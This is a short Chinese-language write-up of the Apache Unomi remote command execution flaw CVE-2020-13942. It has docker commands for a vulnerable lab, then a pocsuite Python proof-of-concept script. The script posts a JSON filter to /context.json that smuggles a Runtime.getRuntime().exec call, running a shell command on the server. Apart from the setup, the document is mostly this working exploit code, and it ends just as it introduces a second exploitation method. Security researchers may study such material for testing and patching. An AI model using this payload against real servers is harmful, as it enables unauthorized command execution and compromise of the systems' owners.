Apache Unomi 命令执行漏洞 CVE-2020-13942)
环境搭建
docker network create unomi
docker run --name elasticsearch --net unomi -p 9200:9200 -p 9300:9300 -e "discovery.type=single-node" -e cluster.name=contextElasticSearch docker.elastic.co/elasticsearch/elasticsearch:7.4.2
docker run --name unomi --net unomi -p 8181:8181 -p 9443:9443 -p 8102:8102 -e UNOMI_ELASTICSEARCH_ADDRESSES=elasticsearch:9200 apache/unomi:1.5.0-SNAPSHOT
漏洞利用
#!/usr/bin/env python
# coding: utf-8
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
import requests
import urllib
requests.packages.urllib3.disable_warnings()
class TestPOC(POCBase):
vulID = '' # ssvid
version = ''
author = ['co0ontty']
vulDate = ''
createDate = ''
updateDate = ''
references = ['']
name = 'CVE-2020-13942'
appPowerLink = ''
appName = ''
appVersion = ''
vulType = ''
desc = '''
'''
samples = ['']
install_requires = ['']
def _verify(self):
vul_url = self.url
cmd = "id"
result = {}
body = '''{"filters":[{"id":"filter1","filters":[{"condition":{"parameterValues": {"": "script::Runtime.getRuntime().exec('touch /tmp/66');"},"type":"profilePropertyCondition"}}]}],"sessionId":"demo-session-id"}'''
resp = requests.post("{}/context.json".format(vul_url),data = body)
if resp.status_code == 200 and all(_ in resp.text for _ in ['profileId','profileProperties','filteringResults','trackedConditions']):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
pass
return self.parse_output(result)
_attack = _verify
def parse_output(self, result):
#parse output
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register(TestPOC)
漏洞作者还给了一种利用方式:
